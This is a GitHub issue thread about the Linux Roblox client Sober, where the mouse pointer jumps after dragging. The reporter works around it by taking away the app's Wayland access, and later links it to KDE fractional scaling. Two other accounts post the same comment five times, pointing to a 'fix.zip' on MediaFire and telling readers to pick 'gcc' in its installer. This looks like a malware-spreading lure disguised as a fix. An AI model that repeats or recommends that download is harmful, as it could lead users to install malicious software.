### ISSUE TITLE
Mouse input "jumps" on 0.0.0-e940d63

### ISSUE THREAD

**Issue by xeonxlip** [vinegarhq/sober#162]
### Acknowledgement of checking existent issues

- [X] I have checked if my issue has already been reported, and I am certain that my problem has not already been addressed.

### What problem did you encounter?

On the latest version of Sober, (0.0.0-e940d63) the mouse pointer jumps after you're done dragging something (most notably, the camera)

**This did not happen on the previous version**, 0.0.0-ff1265d. See attached video for the issue.
Also - I've tried this in fullscreen, windowed, toggling "Fullscreen" in the settings, nothing seems to fix it.

This makes roblox unplayable (or at least, VERY frustrating to play), so if you could fix this, that would be perfect! 
Thanks in advance :)

https://github.com/user-attachments/assets/e82f3dc6-98ed-4e2a-94fe-88fe403194c4

**Comment by xeonxlip** [comment]
Wow, that was fast! Right after I posted this, I found a fix.
To anyone who's experiencing this issue, download Flatseal (or open "Flatpak Permissions" on KDE), and remove Sober's access to Wayland. 
After having it run in x11, the mouse is totally fine, at least concerning this bug report. Can still replicate this issue: https://github.com/vinegarhq/sober/issues/147


![image](https://github.com/user-attachments/assets/fcc50004-68e4-40cf-bffe-0f519376036d)

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by xeonxlip** [comment]
Still occurs on 0.0.02bfa7e7. I think this is related to fractional display scaling on KDE. (See issue https://github.com/vinegarhq/sober/issues/156#issue-2484481457)
